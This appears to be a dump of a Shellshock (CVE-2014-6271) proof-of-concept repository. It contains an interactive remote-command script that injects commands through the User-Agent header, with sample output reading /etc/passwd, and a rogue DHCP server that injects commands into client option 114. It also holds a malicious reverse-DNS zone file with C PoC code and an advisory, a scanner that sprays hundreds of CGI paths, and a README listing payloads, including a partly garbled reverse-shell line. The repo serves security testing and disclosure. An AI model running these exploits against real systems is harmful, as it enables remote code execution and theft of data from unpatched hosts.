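# --------------------------------------------------------------------------------
# /w3af_shocker.py:
# --------------------------------------------------------------------------------
#!/usr/bin/python
"""Drive a w3af ``web_spider`` crawl plus ``shell_shock`` audit against one target URL.

A throw-away w3af console script is written to a temp file, ``w3af_console -s``
is run on it, and the file is removed again.  The audit sends the Shellshock
User-Agent probe to everything the spider finds, so only run it against hosts
you are authorised to test.  Plugin names may need adjusting for your w3af
install.  Runs under Python 2 and 3.
"""

import os
import subprocess
import sys
import tempfile

try:  # Python 2
    from urlparse import urlparse
except ImportError:  # Python 3
    from urllib.parse import urlparse

USAGE = "Usage: w3af_shocker.py <target-url>"


def build_audit_script(target):
    """Return the w3af console script for *target* as a single string.

    Enables the ``web_spider`` crawl plugin and the ``shell_shock`` audit
    plugin, sets the target and issues ``start``.  *target* is written
    verbatim into the ``set target`` line, so validate it with
    ``valid_target`` first.
    """
    lines = [
        "plugins",
        "crawl web_spider",
        "audit shell_shock",
        "back",
        "",
        "target",
        "set target " + target,
        "back",
        "",
        "start",
    ]
    return "\n".join(lines)


def valid_target(target):
    """True for an absolute http(s) URL with a host part and no line breaks.

    A line break inside *target* would let it append extra w3af console
    commands to the generated script; a URL without a host used to crash the
    original ``target.split('/')[2]`` file-name trick with an IndexError.
    """
    if not target or "\n" in target or "\r" in target:
        return False
    parts = urlparse(target)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def main(argv=None):
    """Validate argv, write the audit script, run w3af_console, clean up.

    Returns w3af_console's exit status, or 2 on bad usage.
    """
    argv = sys.argv if argv is None else argv
    if len(argv) != 2 or not valid_target(argv[1]):
        sys.stderr.write(USAGE + "\n")
        return 2
    target = argv[1]

    # Temporary w3af audit file: mkstemp gives an unpredictable name and
    # mode 0600, instead of a predictable host-derived name in the cwd.
    fd, fname = tempfile.mkstemp(prefix="w3af_", suffix=".w3af")
    try:
        with os.fdopen(fd, "w") as f:
            f.write(build_audit_script(target))
        # Invoke w3af_console with the audit script.  Argument list, no shell:
        # neither the target nor the file name is ever parsed by /bin/sh
        # (the original built "w3af_console -s "+fname / "rm "+fname strings).
        return subprocess.call(["w3af_console", "-s", fname])
    finally:
        # Remove the audit script even when w3af_console is missing or fails.
        os.remove(fname)


if __name__ == "__main__":
    sys.exit(main())

# --------------------------------------------------------------------------------
# /shell_shocker.py:
# --------------------------------------------------------------------------------
#!/usr/bin/python

# Successful Output:
# # python shell_shocker.py <url>
# [+] Attempting Shell_Shock - Make sure to type full path
# ~$ /bin/ls /
# bin
# boot
# dev
# etc
# ..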
12 | # ~$ /bin/cat /etc/passwd 13 | 14 | import sys, urllib2 15 | 16 | if len(sys.argv) != 2: 17 | print "Usage: shell_shocker " 18 | sys.exit(0) 19 | 20 | URL=sys.argv[1] 21 | print "[+] Attempting Shell_Shock - Make sure to type full path" 22 | 23 | while True: 24 | command=raw_input("~$ ") 25 | opener=urllib2.build_opener() 26 | opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)] 27 | try: 28 | response=opener.open(URL) 29 | for line in response.readlines(): 30 | print line.strip() 31 | except Exception as e: print e 32 | 33 | -------------------------------------------------------------------------------- /osx-rev-ptr/in-addr.arpa.zone: -------------------------------------------------------------------------------- 1 | ; See the CVE-2014-3671 advisory. 2 | ; 3 | ; Copyright 2014 Dirk-Willem van Gulik, All Rights Reserved. 4 | ; 5 | ; 6 | ; Licensed under the Apache License, Version 2.0 (the "License"); 7 | ; you may not use this file except in compliance with the License. 8 | ; You may obtain a copy of the License at 9 | ; 10 | ; http://www.apache.org/licenses/LICENSE-2.0 11 | ; 12 | ; Unless required by applicable law or agreed to in writing, software 13 | ; distributed under the License is distributed on an "AS IS" BASIS, 14 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 15 | ; See the License for the specific language governing permissions and 16 | ; limitations under the License. 17 | ; 18 | 19 | $TTL 10; 20 | $ORIGIN in-addr.arpa. 21 | 22 | @ IN SOA ns.boem.wleiden.net dirkx.webweaving.org ( 23 | 666 ; serial 24 | 360 180 3600 1800 ; Intentioanlly absurdly short livespans. 25 | ) 26 | IN NS 127.0.0.1 27 | ; Exploit string; 63 char limit. 
28 | * IN PTR "() { :;}; echo CVE-2014-6271, CVE-201407169, RDNS" 29 | 30 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2014 Rob Fuller 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | 23 | -------------------------------------------------------------------------------- /osx-rev-ptr/osx-rev-ptr.c: -------------------------------------------------------------------------------- 1 | /* See the CVE-2014-3671 advisory. 2 | * 3 | * Copyright 2014 Dirk-Willem van Gulik, All Rights Reserved. 4 | * , 5 | * 6 | * Licensed under the Apache License, Version 2.0 (the "License"); 7 | * you may not use this file except in compliance with the License. 
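* You may obtain a copy of the License at
*
*     http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/

#include <arpa/inet.h>
#include <assert.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/*
 * Reverse-resolve argv[1] (a dotted-quad IPv4 address) with getnameinfo(),
 * export the UNSANITISED result as REMOTE_HOST and exec bash -- i.e. the
 * reverse-DNS vector for the bash bug described in CVE-2014-3671.
 *
 * Changes versus the original PoC:
 *  - the argument checks, getnameinfo() and setenv() are real statements
 *    instead of assert() arguments: with -DNDEBUG assert() expands to
 *    nothing, which silently removed the lookup itself;
 *  - sockaddr_in is zeroed before use;
 *  - execl() gets an argv[0] and a (char *)NULL sentinel as POSIX requires;
 *    execl("/bin/bash", NULL) handed bash an empty argv.
 */
int main(int argc, char ** argv) {
    struct in_addr addr;
    struct sockaddr_in sa;
    char host[1024];
    int rc;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <ipv4-address>\n", argv[0]);
        return 2;
    }
    if (inet_aton(argv[1], &addr) != 1) {
        fprintf(stderr, "%s: not an IPv4 address\n", argv[1]);
        return 2;
    }

    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr = addr;

    /* NI_NAMEREQD: fail rather than fall back to the numeric address. */
    rc = getnameinfo((struct sockaddr *)&sa, sizeof sa,
                     host, sizeof host, NULL, 0, NI_NAMEREQD);
    if (rc != 0) {
        fprintf(stderr, "getnameinfo: %s\n", gai_strerror(rc));
        return 1;
    }

    printf("Lookup result: %s\n\n", host);

    /* Deliberately unsanitised: exporting the PTR data verbatim is the
     * vulnerable pattern this PoC exists to demonstrate. */
    if (setenv("REMOTE_HOST", host, 1) != 0) {
        perror("setenv");
        return 1;
    }
    execl("/bin/bash", "bash", (char *)NULL);
    perror("execl");
    return 1;
}

/* -------------------------------------------------------------------------------- */
/* /dhcpshock.py: */
/* -------------------------------------------------------------------------------- */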
/usr/bin/env python 2 | 3 | #Based on the PoC from https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/ 4 | #Created by @byt3bl33d3r 5 | 6 | import binascii 7 | import argparse 8 | import logging 9 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy 10 | 11 | from scapy.all import * 12 | 13 | parser = argparse.ArgumentParser(description='DHCPShock', epilog='Shock dem shells!') 14 | parser.add_argument('-i', '--iface', type=str, required=True, help='Interface to use') 15 | parser.add_argument('-c', '--cmd', type=str, help='Command to execute [default: "echo pwned"]') 16 | 17 | args = parser.parse_args() 18 | 19 | command = args.cmd or "echo 'pwned'" 20 | 21 | if os.geteuid() != 0: 22 | sys.exit("Run me as r00t") 23 | 24 | #BOOTP 25 | #siaddr = DHCP server ip 26 | #yiaddr = ip offered to client 27 | #xid = transaction id 28 | #chaddr = clients mac address in binary format 29 | 30 | def dhcp_offer(raw_mac, xid): 31 | packet = (Ether(src=get_if_hwaddr(args.iface), dst='ff:ff:ff:ff:ff:ff') / 32 | IP(src="192.168.2.1", dst='255.255.255.255') / 33 | UDP(sport=67, dport=68) / 34 | BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr='192.168.2.4', siaddr='192.168.2.1', xid=xid) / 35 | DHCP(options=[("message-type", "offer"), 36 | ('server_id', '192.168.2.1'), 37 | ('subnet_mask', '255.255.255.0'), 38 | ('router', '192.168.2.5'), 39 | ('lease_time', 172800), 40 | ('renewal_time', 86400), 41 | ('rebinding_time', 138240), 42 | "end"])) 43 | 44 | return packet 45 | 46 | 47 | def dhcp_ack(raw_mac, xid, command): 48 | packet = (Ether(src=get_if_hwaddr(args.iface), dst='ff:ff:ff:ff:ff:ff') / 49 | IP(src="192.168.2.1", dst='255.255.255.255') / 50 | UDP(sport=67, dport=68) / 51 | BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr='192.168.2.4', siaddr='192.168.2.1', xid=xid) / 52 | DHCP(options=[("message-type", "ack"), 53 | ('server_id', '192.168.2.1'), 54 | ('subnet_mask', '255.255.255.0'), 55 | ('router', 
'192.168.2.5'), 56 | ('lease_time', 172800), 57 | ('renewal_time', 86400), 58 | ('rebinding_time', 138240), 59 | (114, "() { ignored;}; " + command), 60 | "end"])) 61 | 62 | return packet 63 | 64 | 65 | def dhcp(resp): 66 | if resp.haslayer(DHCP): 67 | mac_addr = resp[Ether].src 68 | raw_mac = binascii.unhexlify(mac_addr.replace(":", "")) 69 | 70 | if resp[DHCP].options[0][1] == 1: 71 | xid = resp[BOOTP].xid 72 | print "[*] Got dhcp DISCOVER from: " + mac_addr + " xid: " + hex(xid) 73 | print "[*] Sending OFFER..." 74 | packet = dhcp_offer(raw_mac, xid) 75 | #print hexdump(packet) 76 | #print packet.show() 77 | sendp(packet, iface=args.iface) 78 | 79 | if resp[DHCP].options[0][1] == 3: 80 | xid = resp[BOOTP].xid 81 | print "[*] Got dhcp REQUEST from: " + mac_addr + " xid: " + hex(xid) 82 | print "[*] Sending ACK..." 83 | packet = dhcp_ack(raw_mac, xid, command) 84 | #print hexdump(packet) 85 | #print packet.show() 86 | sendp(packet, iface=args.iface) 87 | 88 | print "[*] Waiting for a DISCOVER..." 89 | sniff(filter="udp and (port 67 or 68)", prn=dhcp, iface=args.iface) 90 | -------------------------------------------------------------------------------- /osx-rev-ptr/CVE-2014-3671.txt: -------------------------------------------------------------------------------- 1 | -----BEGIN PGP SIGNED MESSAGE----- 2 | Hash: SHA1 3 | 4 | Security Advisory 5 | 6 | DNS Reverse Lookup as a vector for the Bash vulnerability (CVE-2014-6271 et.al.) 7 | 8 | CVE-2014-3671 9 | 10 | references: 11 | CVE-2014-6271, CVE-2014-7169, CVE-2014-6277, CVE-2014-6278 12 | CVE-2014-7186 and, CVE-2014-7187 13 | 14 | * Summary: 15 | 16 | Above CVEs detail a number of flaws in bash prior related to the parsing 17 | of environment variables (aka BashBug, Shellshock). Several networked 18 | vectors for triggering this bug have been discovered; such as through 19 | dhcp options and CGI environment variables in webservers [1]. 
20 | 21 | This document is to advise you of an additional vector; through a 22 | reverse lookup in DNS; and where the results of this lookup are 23 | passed, unsanitized, to an environment variable (e.g. as part of 24 | a batch process). 25 | 26 | This vector is subtly different from a normal attack vector, as the 27 | attacker can 'sit back' and let a (legitimate) user trigger the 28 | issue; hence keeping the footprint for a IDS or WAAS to act on small. 29 | 30 | * Resolvers/systems affected: 31 | 32 | At this point of time the stock resolvers (in combination with the libc 33 | library) of OSX 10.9 (all versions) and 10.10/R2 are the only known 34 | standard installations that pass the bash exploit string back and 35 | up to getnameinfo(). 36 | 37 | That means that UNpatched systems are vulnerable through this vector 38 | PRIOR to the bash update documented in http://support.apple.com/kb/DL1769. 39 | 40 | Most other OS-es (e.g. RHEL6, Centos, FreeBSD 7 and up, seem 41 | unaffected in their stock install as libc/libresolver and DNS use 42 | different escaping mechanisms (octal v.s. decimal). 43 | 44 | We're currently following investing a number of async DNS resolvers 45 | that are commonly used in DB cache/speed optimising products and 46 | application level/embedded firewall systems. 47 | 48 | Versions affected: 49 | 50 | See above CVEs as your primary source. 51 | 52 | * Resolution and Mitigation: 53 | 54 | In addition to the mitigations listed in above CVEs - IDSes and similar 55 | systems may be configured to parse DNS traffic in order to spot the 56 | offending strings. 57 | 58 | Also note that Apple DL1769 addresses the Bash issue; NOT the vector 59 | through the resolver. 60 | 61 | * Reproducing the flaw: 62 | 63 | A simple zone file; such as: 64 | 65 | $TTL 10; 66 | $ORIGIN in-addr.arpa. 67 | @ IN SOA ns.boem.wleiden.net dirkx.webweaving.org ( 68 | 666 ; serial 69 | 360 180 3600 1800 ; very short lifespan. 
70 | ) 71 | IN NS 127.0.0.1 72 | * PTR "() { :;}; echo CVE-2014-6271, CVE-201407169, RDNS" 73 | 74 | can be used to create an environment in which to test the issue with existing code 75 | or with the following trivial example: 76 | 77 | #include 78 | #include 79 | #include 80 | #include 81 | #include 82 | #include 83 | #include 84 | #include 85 | 86 | int main(int argc, char ** argv) { 87 | struct in_addr addr; 88 | struct sockaddr_in sa; 89 | char host[1024]; 90 | 91 | assert(argc==2); 92 | assert(inet_aton(argv[1],&addr) == 1); 93 | 94 | sa.sin_family = AF_INET; 95 | sa.sin_addr = addr; 96 | 97 | assert(0==getnameinfo((struct sockaddr *)&sa, sizeof sa, 98 | host, sizeof host, NULL, 0, NI_NAMEREQD)); 99 | 100 | printf("Lookup result: %s\n\n", host); 101 | 102 | assert(setenv("REMOTE_HOST",host,1) == 0); 103 | execl("/bin/bash",NULL); 104 | } 105 | 106 | 107 | Credits and timeline 108 | 109 | The flaw was found and reported by Stephane Chazelas (see CVE-2014-6271 110 | for details). Dirk-Willem van Gulik (dirkx(at)webweaving.org) found 111 | the DNS reverse lookup vector. 112 | 113 | 09-04-2011 first reported. 114 | 2011, 2014 issue verified on various embedded/firewall/waas 115 | systems and reported to vendors. 116 | ??-09-2014 Apple specific exploited seen. 117 | 11-10-2014 Apple confirms that with DL1769 in place that 118 | "The issue that remains, while it raises 119 | interesting questions, is not a security 120 | issue in and of itself." 121 | 122 | * Common Vulnerability Scoring (Version 2) and vector: 123 | 124 | See CVE-2014-6271. 125 | 126 | 1:https://github.com/mubix/shellshocker-pocs/blob/master/README.md) 127 | 1.10 / : 1726 $ 128 | -----BEGIN PGP SIGNATURE----- 129 | Version: GnuPG/MacGPG2 v2.0.22 (Darwin) 130 | Comment: This message is encrypted and/or signed with PGP (gnu-pg, gpg). Contact dirkx@webweaving.org if you cannot read it. 
131 | 132 | iQCVAwUBVDujjDGmPZbsFAuBAQKGqwP+OOzdL8PDZF7Ckpk1UCxZZoWYvvGUHBqs 133 | dE8ioLaQsRDKJ+V2EbBGHmSucYLPqBVfRYaYar21KCl6DAcxzQmxhymxxpRjBPsP 134 | uauqW7dYZQASDkKG9Rn0KA4dXNo9GjrJMrTcwkfkoNb5EtVtiMDX8VXoZ4SqLJS0 135 | v5s8ZtQiIw4= 136 | =I6vK 137 | -----END PGP SIGNATURE----- 138 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Shellshocker - Repository of "Shellshock" Proof of Concept Code 2 | ================= 3 | 4 | Collection of Proof of Concepts and Potential Targets for #ShellShocker 5 | 6 | Wikipedia Link: https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details 7 | 8 | Please submit a pull request if you have more links or other resources 9 | 10 | **Speculation (unconfirmed, possibly vulnerable)** 11 | 12 | + XMPP(ejabberd) 13 | + ~~Mailman~~ - [confirmed not vulnerable](http://www.mail-archive.com/mailman-users%40python.org/msg65380.html) 14 | + MySQL 15 | + NFS 16 | + Bind9 17 | + Procmail [see](https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html) 18 | + Exim [see](https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html) 19 | + Juniper - Google search: `inurl:/dana-na/auth/url_default/welcome.cgi` 20 | + via: https://twitter.com/notsosecure/status/516132301025984512 21 | + via: http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10648&actp=RSS 22 | + Cisco Gear 23 | + via: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash 24 | + FreePBX / Asterisk [patched here](http://community.freepbx.org/t/cve-2014-6271-shellshock-bash-exploit/24431) 25 | 26 | **If you know of PoCs for any of these, please submit an issue or pull request with a link.** 27 | 28 | ## Command Line (Linux, OSX, and Windows via Cygwin) 29 | 30 | + [bashcheck](https://github.com/hannob/bashcheck) - script to test for 
the latest vulns 31 | 32 | ### CVE-2014-6271 33 | + `env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id` 34 | 35 | ### CVE-2014-7169 36 | _will create a file named echo in cwd with date in it, if vulnerable_ 37 | + `env X='() { (a)=>\' bash -c "echo date"; cat echo` 38 | 39 | ### CVE-2014-7186 40 | + `bash -c 'true <& /dev/tcp/REVERSESHELLIP/PORT 0>&1'` 100 | + (necessary to have a git account on the server) 101 | 102 | ## OSX 103 | + Priv Escalation via VMware Fusion - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb 104 | + Fix: http://support.apple.com/kb/DL1769 105 | 106 | ## OSX - with reverse DNS (CVE-2014-3671.txt) 107 | + Example zone file: [in-addr.arpa](osx-rev-ptr/in-addr.arpa.zone) that contains a CVE-2014-6271 example. 108 | + Example file with a getnameinfo() that passes on to setenv(): [osx-rev-ptr.c](osx-rev-ptr/osx-rev-ptr.c) 109 | + Advisory with description of above [CVE-2014-3671.txt ](osx-rev-ptr/CVE-2014-3671.txt) 110 | 111 | ## SIP 112 | + SIP Proxies: https://github.com/zaf/sipshock 113 | 114 | 115 | ## Qmail 116 | + Detailed walkthrough - http://marc.info/?l=qmail&m=141183309314366&w=2 117 | + Tweet from @ymzkei5 - http://twitter.com/ymzkei5/status/515328039765307392 118 | + http://twitpic.com/ec3615 119 | + http://twitpic.com/ec361o 120 | 121 | ## Postfix 122 | + http://packetstormsecurity.com/files/128572/postfixsmtp-shellshock.txt 123 | 124 | ## FTP 125 | + Pure-FTPd: https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc 126 | + Metasploit Exploit Module - [Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb) 127 | 128 | ## OpenVPN 129 | + OpenVPN - https://news.ycombinator.com/item?id=8385332 130 | + PoC Walkthrough by @fj33r - http://sprunge.us/BGjP 131 | 132 | ## Oracle 133 | + [Alert and list of affected 
Products](http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html) 134 | 135 | ## TMNT 136 | + https://twitter.com/SynAckPwn/status/514961810320293888/photo/1 137 | 138 | ## Hand 139 | + Via @DJManilaIce - http://pastie.org/9601055 140 | ``` 141 | user@localhost:~$ env X='() { (a)=>\' /bin/bash -c "shellshocker echo -e \" __ __\n / V \ \n _ | | |\n / \ | | |\n | | | | |\n | | | | |\n | |__| | |\n | | \ |___|___\n | \ |/ \ \n | | |______ |\n | | | |\n | \__' / |\n \ \( /\n \ /\n \| |\n\""; cat shellshocker 142 | /bin/bash: X: line 1: syntax error near unexpected token `=' 143 | /bin/bash: X: line 1: `' 144 | /bin/bash: error importing function definition for `X' 145 | __ __ 146 | / V \ 147 | _ | | | 148 | / \ | | | 149 | | | | | | 150 | | | | | | 151 | | |__| | | 152 | | | \ |___|___ 153 | | \ |/ \ 154 | | | |______ | 155 | | | | | 156 | | \__' / | 157 | \ \( / 158 | \ / 159 | \| | 160 | 161 | ``` 162 | 163 | ## CUPS 164 | + Metasploit Exploit Module - [CUPS Filter Bash Environment Variable Code Injection](https://github.com/rapid7/metasploit-framework/pull/4050) 165 | 166 | ## IRC 167 | + Metasploit Exploit Module - [Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/xdh_x_exec.rb) 168 | + Metasploit Exploit Module - [Legend Perl IRC Bot Remote Code Execution](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/legend_bot_exec.rb) 169 | 170 | ## Scripts from @primalsec 171 | + `shell_shocker.py` - Good for interacting with a known vulnerable URL to pass commands (User-Agent Method) 172 | + `w3af_shocker.py` - Automates the process of running a w3af spider/shell\_shock scan (User-Agent Method) 173 | + `shell_sprayer.py` - Checks across a list of URLs in a file, or a single URL against a known list of cgi-bin resources (User-Agent Method) 174 | 175 | All three send a live Shellshock payload in the `User-Agent` header (not a passive version check), and `shell_sprayer.py` requests several hundred CGI paths per host; point them only at systems you are authorised to test. 176 | 
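# --------------------------------------------------------------------------------
# /shell_sprayer.py:
# --------------------------------------------------------------------------------
#!/usr/bin/python
"""Spray the Shellshock (CVE-2014-6271) User-Agent probe over common CGI paths.

For every target base URL the script requests each path in ``reqs`` with a
User-Agent of ``() { :;}; echo Content-Type: text/plain ; echo "TEST: TEST"``.
A bash CGI handler that imports the function definition runs the trailing
``echo`` and so emits a ``TEST: TEST`` response header, which is what the
check looks for.  The probe itself is harmless, but it is a live exploit
attempt and several hundred requests per host: only run it against systems
you are authorised to test.

Works under Python 2 (urllib2) and Python 3 (urllib.request).
"""

import optparse
import sys

try:  # Python 2
    from urllib2 import build_opener
except ImportError:  # Python 3
    from urllib.request import build_opener

# Header value a Shellshock-vulnerable bash CGI will execute.
SHOCK_UA = '() { :;}; echo Content-Type: text/plain ; echo "TEST: TEST"'
# Marker the payload plants in the response headers.
MARKER = 'TEST: TEST'
# Per-request timeout in seconds; without one a single stalled host blocks the whole sweep.
DEFAULT_TIMEOUT = 10

# Resources to request on each host (module-level so scanner() works without main()).
reqs = [
    '/', '/cgi-bin/status', '/_mt/mt.cgi', '/admin.cgi', '/administrator.cgi',
    '/agora.cgi', '/aktivate/cgi-bin/catgy.cgi', '/analyse.cgi',
    '/apps/web/vs_diag.cgi', '/axis-cgi/buffer/command.cgi',
    '/bandwidth/index.cgi', '/bigconf.cgi', '/cart.cgi', '/cartcart.cgi',
    '/ccbill/whereami.cgi', '/cgi-bin-sdb/printenv',
    '/cgi-bin/.cobalt/alert/service.cgi', '/cgi-bin/.cobalt/message/message.cgi',
    '/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi', '/cgi-bin/.namazu.cgi',
    '/cgi-bin/14all-1.1.cgi', '/cgi-bin/14all.cgi', '/cgi-bin/a1disp3.cgi',
    '/cgi-bin/a1stats/a1disp3.cgi', '/cgi-bin/a1stats/a1disp4.cgi',
    '/cgi-bin/add_ftp.cgi', '/cgi-bin/addbanner.cgi', '/cgi-bin/adduser.cgi',
    '/cgi-bin/admin.cgi', '/cgi-bin/admin.pl', '/cgi-bin/admin/admin.cgi',
    '/cgi-bin/admin/setup.cgi', '/cgi-bin/adminhot.cgi', '/cgi-bin/adminwww.cgi',
    '/cgi-bin/af.cgi', '/cgi-bin/aglimpse.cgi', '/cgi-bin/alienform.cgi',
    '/cgi-bin/AnyBoard.cgi', '/cgi-bin/architext_query.cgi',
    '/cgi-bin/astrocam.cgi', '/cgi-bin/AT-admin.cgi', '/cgi-bin/AT-generate.cgi',
    '/cgi-bin/auction/auction.cgi', '/cgi-bin/auktion.cgi',
    '/cgi-bin/ax-admin.cgi', '/cgi-bin/ax.cgi', '/cgi-bin/axs.cgi',
    '/cgi-bin/badmin.cgi', '/cgi-bin/banner.cgi', '/cgi-bin/bannereditor.cgi',
    '/cgi-bin/bb-ack.sh', '/cgi-bin/bb-hist.sh', '/cgi-bin/bb-histlog.sh',
    '/cgi-bin/bb-hostsvc.sh', '/cgi-bin/bb-rep.sh', '/cgi-bin/bb-replog.sh',
    '/cgi-bin/bbs_forum.cgi', '/cgi-bin/bigconf.cgi',
    '/cgi-bin/bizdb1-search.cgi', '/cgi-bin/blog/mt-check.cgi',
    '/cgi-bin/blog/mt-load.cgi', '/cgi-bin/bnbform.cgi', '/cgi-bin/book.cgi',
    '/cgi-bin/boozt/admin/index.cgi', '/cgi-bin/bsguest.cgi',
    '/cgi-bin/bslist.cgi', '/cgi-bin/build.cgi', '/cgi-bin/bulk/bulk.cgi',
    '/cgi-bin/c_download.cgi', '/cgi-bin/cached_feed.cgi',
    '/cgi-bin/cachemgr.cgi', '/cgi-bin/calendar/index.cgi',
    '/cgi-bin/cartmanager.cgi', '/cgi-bin/cbmc/forums.cgi',
    '/cgi-bin/ccvsblame.cgi', '/cgi-bin/cgforum.cgi', '/cgi-bin/cgi_process',
    '/cgi-bin/classified.cgi', '/cgi-bin/classifieds.cgi',
    '/cgi-bin/classifieds/classifieds.cgi', '/cgi-bin/classifieds/index.cgi',
    '/cgi-bin/commandit.cgi', '/cgi-bin/commerce.cgi',
    '/cgi-bin/common/listrec.pl', '/cgi-bin/compatible.cgi',
    '/cgi-bin/Count.cgi', '/cgi-bin/csChatRBox.cgi', '/cgi-bin/csGuestBook.cgi',
    '/cgi-bin/csLiveSupport.cgi', '/cgi-bin/CSMailto.cgi',
    '/cgi-bin/CSMailto/CSMailto.cgi', '/cgi-bin/csNews.cgi',
    '/cgi-bin/csNewsPro.cgi', '/cgi-bin/csPassword.cgi',
    '/cgi-bin/csPassword/csPassword.cgi', '/cgi-bin/csSearch.cgi',
    '/cgi-bin/csv_db.cgi', '/cgi-bin/cvsblame.cgi', '/cgi-bin/cvslog.cgi',
    '/cgi-bin/cvsquery.cgi', '/cgi-bin/cvsqueryform.cgi',
    '/cgi-bin/day5datacopier.cgi', '/cgi-bin/day5datanotifier.cgi',
    '/cgi-bin/db_manager.cgi', '/cgi-bin/dbman/db.cgi', '/cgi-bin/dcforum.cgi',
    '/cgi-bin/dfire.cgi', '/cgi-bin/diagnose.cgi', '/cgi-bin/dig.cgi',
    '/cgi-bin/directorypro.cgi', '/cgi-bin/download.cgi',
    '/cgi-bin/emu/html/emumail.cgi', '/cgi-bin/emumail.cgi',
    '/cgi-bin/emumail/emumail.cgi', '/cgi-bin/enter.cgi', '/cgi-bin/environ.cgi',
    '/cgi-bin/ezadmin.cgi', '/cgi-bin/ezboard.cgi', '/cgi-bin/ezman.cgi',
    '/cgi-bin/ezshopper/loadpage.cgi', '/cgi-bin/ezshopper/search.cgi',
    '/cgi-bin/ezshopper2/loadpage.cgi', '/cgi-bin/ezshopper3/loadpage.cgi',
    '/cgi-bin/faqmanager.cgi', '/cgi-bin/FileSeek.cgi', '/cgi-bin/FileSeek2.cgi',
    '/cgi-bin/finger.cgi', '/cgi-bin/flexform.cgi', '/cgi-bin/fom.cgi',
    '/cgi-bin/fom/fom.cgi', '/cgi-bin/FormHandler.cgi', '/cgi-bin/FormMail.cgi',
    '/cgi-bin/gbadmin.cgi', '/cgi-bin/gbook/gbook.cgi', '/cgi-bin/generate.cgi',
    '/cgi-bin/getdoc.cgi', '/cgi-bin/gH.cgi', '/cgi-bin/gm-authors.cgi',
    '/cgi-bin/gm-cplog.cgi', '/cgi-bin/gm.cgi', '/cgi-bin/guestbook.cgi',
    '/cgi-bin/handler', '/cgi-bin/handler.cgi', '/cgi-bin/handler/netsonar',
    '/cgi-bin/hitview.cgi', '/cgi-bin/hsx.cgi', '/cgi-bin/html2chtml.cgi',
    '/cgi-bin/html2wml.cgi', '/cgi-bin/htsearch.cgi', '/cgi-bin/icat',
    '/cgi-bin/if/admin/nph-build.cgi', '/cgi-bin/ikonboard/help.cgi',
    '/cgi-bin/imageFolio.cgi', '/cgi-bin/ImageFolio/admin/admin.cgi',
    '/cgi-bin/infosrch.cgi', '/cgi-bin/jammail.pl', '/cgi-bin/journal.cgi',
    '/cgi-bin/lastlines.cgi', '/cgi-bin/loadpage.cgi', '/cgi-bin/log-reader.cgi',
    '/cgi-bin/login.cgi', '/cgi-bin/logit.cgi', '/cgi-bin/lookwho.cgi',
    '/cgi-bin/lwgate.cgi', '/cgi-bin/MachineInfo', '/cgi-bin/magiccard.cgi',
    '/cgi-bin/mail/emumail.cgi', '/cgi-bin/mail/nph-mr.cgi',
    '/cgi-bin/maillist.cgi', '/cgi-bin/mailnews.cgi', '/cgi-bin/main.cgi',
    '/cgi-bin/main_menu.pl', '/cgi-bin/man.sh', '/cgi-bin/mini_logger.cgi',
    '/cgi-bin/mmstdod.cgi', '/cgi-bin/moin.cgi', '/cgi-bin/mojo/mojo.cgi',
    '/cgi-bin/mrtg.cgi', '/cgi-bin/mt-static/mt-check.cgi',
    '/cgi-bin/mt-static/mt-load.cgi', '/cgi-bin/mt/mt-check.cgi',
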